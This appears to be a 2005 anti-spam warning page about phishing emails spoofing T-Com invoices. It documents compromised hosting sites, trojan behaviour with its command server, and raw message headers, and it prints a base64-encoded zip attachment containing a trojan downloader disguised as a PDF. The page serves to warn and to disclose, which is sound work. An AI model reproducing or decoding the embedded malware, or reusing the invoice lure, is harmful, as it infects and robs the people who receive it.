|
Fake T-Com invoices (phishing)Between November 2004 and July 2005, four incidents took place in which customers of T-Com, the largest ISP in Germany, were attacked. Using spam and spamvertized websites all connected to a specific internet provider in the USA, the criminals attempted to install "trojan horse" software on the victims' computers, which for example might allow them to steal passwords for online banking or to conduct cyber attacks. We don't know why all these spams are connected to the same webhosting company or who is behind the crimes. The fact that the same company keeps appearing in these scams is particularly worrying.
It appears that first the criminals hacked into at least four different websites all hosted by the same provider (probably all sites at that provider are vulnerable). Then they uploaded a scam page to looks like the billing page of T-Com. Finally they sent out fake monthly invoice notifications with a link to the scam page. A Javascript module on the hacked websites tries to installs a Trojan on the machines. Unless current security updates are in place this may well succeed. Be careful when logging into a website using a link provided in an email. Make sure you double check the URL of the website that you are directed to.
Example #1: From: Deutsche Telekom AG <Rechnung-Online@telekom.de>
Example #2: From: Deutsche Telekom AG <Rechnung-Online@telekom.de> Phishing URLs:
Name: kimlafleur.com Address: 66.235.192.211 Name: alkhalaf.net Address: 66.235.192.199 Name: ntuaa-dfw.org Address: 66.235.192.141 Name: noharmm.org Address: 66.235.192.145 OrgName: iPowerWeb, Inc. OrgID: IPOWE Address: 2800 28th Street Suite 205 City: Santa Monica StateProv: CAJavascript code on the site downloads an MS-DOS executable which opens two ports on the client machine: 49999 and 25677. It then runs a PHP-script on a server in Denmark (tobiasfriis.dk / 193.201.35.63) by issuing an HTTP-GET with URL /csrv.php, passing the following parameters: socketport=49999 httpport=25677 uptimem=31 uptimeh=12 uid= scode=Then it issues an HTTP-POST to /dat7.php
New "T-COM invoice" trojan attack (2005-01-29) On 2005-01-29 we received a new version of this malware email. The spam was sent from the same webhosted that hosted all websites in the previous attack in November 2004. The attachment contains a small executable program "rechnung2005-02.pdf.exe" which Kaspersky Anti-Virus identifies as "Trojan-Downloader.Win32.Vidlo.h". We have notified ipowerweb.com of the problem. The fact that the previous attack used four existing accounts of their customers pointed away from particular customers and towards a basic security problem with iPowerWeb's hosting service which they don't seem to have addressed in the more than two months that had passed.
Return-Path: <Rechnung-Online@t-com.net> Received: from host175.ipowerweb.com (HELO host175.ipowerweb.com) (66.235.199.151) by mx0.gmx.net (mx061) with SMTP; 29 Jan 2005 17:44:54 +0100 Received: from oxhdxyai (242.0.54.62) by host175.ipowerweb.com; Sat, 29 Jan 2005 08:44:54 -0800 Message-ID: <000e01c47335$5b089cf2$db748a52@oxhdxyai> Reply-To: <Rechnung-Online@t-com.net> From: <Rechnung-Online@t-com.net> To: <joewein@gmx.net> Subject: =?koi8-r?B?UmVjaG51bmc=?= Date: Sat, 29 Jan 2005 08:44:54 -0800 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0002_01C48A52.DB749CF2" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1158 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 X-GMX-Antivirus: -1 (not scanned, may not use virus scanner) X-GMX-Antispam: -2 (not scanned, spam filter disabled) ------=_NextPart_000_0002_01C48A52.DB749CF2 Content-Type: text/plain; charset="koi8-r" Content-Transfer-Encoding: quoted-printable Guten Tag, die Gesamtsumme f=D8r Ihre Rechnung im Monat Februar 2005 betr=C4gt: 144,81= Euro. Mit dieser E-Mail erhalten Sie Ihre aktuelle Rechnung und - soweit von Ihnen beauftragt - die Einzelverbindungs=D8bersicht. Nutzen Sie auch unter www.t-com.de/rechnung die vielf=C4ltigen M=C3glichkei= ten von Rechnung Online, wie z.B. Sortier- und Auswertungsfunktionen. =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D RECHNUNG ONLINE - TIPP DES MONATS Die aktuellen Top-Angebote der Deutschen Telekom finden Sie unter: www.t-com.de/aktuell Auskunft per SMS Einfach Anfrage per SMS an die 11833* - Die Antwort kommt sekundenschnell z= ur=D8ck. 11833* - Wir sind die Auskunft. *pro SMS-Abfrage 69 Cent aus den dt. Mobilfunknetzen, 49 Cent aus dem Festn= etz von T-Com. Pro Anfrage per Telefonanruf einmalig 20 Cent zzgl. 99 Cent/Min. =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D Bei Fragen zu Rechnung Online oder zum Rechnungsinhalt klicken Sie bitte un= ter www.t-com.de/rechnung (oben links) auf "Kontakt". Mit freundlichen Gr=D8=F1en Ihre T-Com ---------------------------------------------------------- Aktuelle Informationen zu den Allgemeinen Gesch=C4ftsbedingungen finden Sie= unter www.t-com.de/aktuell-agb. Zum =E3ffnen der PDF-Dateien verwenden Sie bitte den Adobe Acrobat Reader a= b Version 5.0. Ist dieser auf Ihrem PC noch nicht installiert, k=C3nnen Sie die aktue= lle Version unter www.t-com.de/pdf kostenlos herunterladen. ------=_NextPart_000_0002_01C48A52.DB749CF2 Content-Type: application/x-zip-compressed; name="=?koi8-r?B?OC56aXA=?=" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="=?koi8-r?B?OC56aXA=?=" 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 ------=_NextPart_000_0002_01C48A52.DB749CF2--
New "T-COM invoice" trojan attack (2005-05-24) On 2005-05-24 we received a yet another version of this malware email. This is the third T-Com invoice spoof in half a year, all from the same webhosting company. Previous attacks took place in November 2004 and January 2005. The most recent attachment contains a small executable program "2005-05-01.PDF.exe" which Kaspersky Anti-Virus identifies as "Trojan-Dropper.Win32.Agent.mc". We have notified ipowerweb.com of the problem. The fact that the first attack used four existing accounts of their customers pointed away from particular customers and towards a basic security problem with iPowerWeb's hosting service. They still don't seem to have addressed, even four months after the second attack in January. Something smells very phishy here...
Received: from [66.235.192.134] (helo=host128.ipowerweb.com) by mxeu3.kundenserver.de with ESMTP (Nemesis), id 0MKqIe-1DaasZ0kPr-0007a2 for emailaddress; Tue, 24 May 2005 16:59:35 +0200 Received: from yxmxqpd (69.14.237.246) by host128.ipowerweb.com; Tue, 24 May 2005 07:59:29 -0700 Date: Tue, 24 May 2005 07:59:29 -0700 From:
UPDATE: New T-COM spam (2005-07-03 Yet another Trojan arrived on 2005-07-03 from the same source, iPowerweb. Guten Tag, Message headers: Received: from [66.235.192.134] (helo=host128.ipowerweb.com) by mxeu6.kundenserver.de with ESMTP (Nemesis), id 0MKsUu-1Dp8lB2JUr-0004Ov for info@cannabislegal.de; Sun, 03 Jul 2005 20:00:05 +0200 Received: from xiujoq (66.33.215.176) by host128.ipowerweb.com; Sun, 3 Jul 2005 11:00:00 -0700 Date: Sun, 3 Jul 2005 11:00:00 -0700 From: <Rechnung-Online@t-com.net> X-Mailer: The Bat! (v2.01) Reply-To: <Rechnung-Online@t-com.net> X-Priority: 3 (Normal) Message-ID: <5639420432.20050526140255@t-com.net> To: <info@cannabislegal.de> Subject: Rechnung Online Monat Juli 2005
|